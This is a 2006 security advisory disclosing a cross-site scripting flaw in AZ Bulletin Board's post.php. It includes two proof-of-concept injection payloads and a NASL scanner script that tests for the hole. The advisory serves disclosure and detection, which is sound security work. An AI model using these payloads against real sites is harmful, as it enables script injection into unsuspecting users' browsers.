Azbb v1.1.00 Cross-Site Scripting
[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting
KAPDA New advisory
Vulnerable products : Azbb <= 1.1.00
Vendor: www.azbb.org
Risk: Low
Vulnerabilities: Cross Site Scripting
Date :
--------------------
Found : Jan 20 2006
Vendor Contacted : Jan 21 2006
Release Date : Jan 21 2006
About :
--------------------
AZbb is "a forum that was written with a primary focus on security.
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can
even be used as a blog, or a portal".
Vulnerability:
--------------------
Cross_Site_Scripting (XSS,CSS):
AZ Bulletin Board is affected by a cross-site scripting vulnerability.
This issue is due to the failure of the application to properly sanitize
user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker to
create a malicious link containing script code that will be executed in the
browser of an unsuspecting user when followed.
PoC :
--------------------
1)
This flaw exists because the application does not validate the "name" variable
upon submission to the post.php script via the POST method.
h**p://www.[target]/post.php name="><script>alert('XSS')</script><!--
2)[limited XSS]
h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"
NASL :
--------------------
azbb_1100_XSS.nasl
#
# This script was written by Pedram Hayati <pi3ch at kapda dot ir>
# (C) KAPDA Computer Security Science Researchers Institute
# http://www.kapda.ir
#
# This script is released under the GNU GPL v2
if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";
script_name(english:name["english"]);
desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks post.php XSS";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");
family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if (!get_port_state(port))exit(0);
if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);
foreach dir (cgi_dirs())
{
req = string(dir,
"/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
security_warning(port);
exit(0);
}
}
exit(0);
Solution :
--------------------
N/A
Original Advisory :
--------------------
http://kapda.ir/advisory-236.html
Credit :
--------------------
Discoverd by Roozbeh Afrasiabi
roozbeh_afrasiabi {a] yahoo.com
black_death {a] kapda.ir
www.persiax.com [currently down]
NASL Script by pi3ch {a] kapda.ir
KAPDA - Institute for Computer Security Researchers
http://www.KAPDA.ir